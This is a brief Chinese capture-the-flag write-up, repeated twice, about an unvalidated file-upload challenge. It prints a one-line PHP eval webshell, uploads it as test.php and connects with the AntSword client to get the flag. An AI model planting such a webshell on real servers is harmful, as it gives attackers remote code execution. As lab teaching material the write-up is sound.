由题目可以知道,网站对于我们上传的任何文件都不做验证
可以确定思路:上传木马->获取靶机shell->在网站中寻找flag
我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?> 保存为test.php上传至网站中
可以得到上传文件的相对路径:upload/test.php
然后通过中国蚁剑去连接木马即可得到flag
2024-02-01 11:37:04
由题目可以知道,网站对于我们上传的任何文件都不做验证
可以确定思路:上传木马->获取靶机shell->在网站中寻找flag
我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?> 保存为test.php上传至网站中
可以得到上传文件的相对路径:upload/test.php
然后通过中国蚁剑去连接木马即可得到flag